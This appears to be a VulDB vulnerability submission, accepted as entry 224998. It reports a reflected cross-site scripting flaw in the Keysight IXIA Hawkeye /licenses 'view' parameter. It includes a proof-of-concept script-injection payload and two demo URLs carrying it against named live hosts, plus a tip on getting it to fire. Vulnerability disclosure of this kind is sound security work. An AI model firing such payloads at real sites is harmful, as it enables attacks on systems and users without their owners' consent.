| 제목 | Reflected XSS - Hawkeye framework |
|---|
| 설명 | When accessing the url, we are redirected to a screen that has a hyperlink "licenses", when accessing this directory and entering "licenses?view=teste"><script>alert(%27c4ng4c3ir0%27)</script>", the alert is displayed in the browser.
Vulnerable Resource: Hawkeye framework
Version x.x.x.x, Copyright © 2023, IXIA | IXIA Hawkeye, 25 Endpoint Solution Bundle
Demo urls:
http://www.ghome2.com/licenses?view=teste%22%3E%3Cscript%3Ealert(%27c4ng4c3ir0%27)%3C/script%3E
https://hawkeye.cb-es.comcast.com/licenses?view=teste%22%3E%3Cscript%3Ealert(%27c4ng4c3ir0%27)%3C/script%3E
If the alert does not appear, access the url again, as apparently it is necessary to receive a cookie from the application to work. |
|---|
| 사용자 | c4ng4c3ir0 (UID 38456) |
|---|
| 제출 | 2023. 03. 24. PM 05:39 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 05. AM 08:32 (12 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 224998 [Keysight IXIA Hawkeye 3.3.16.28 /licenses view 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|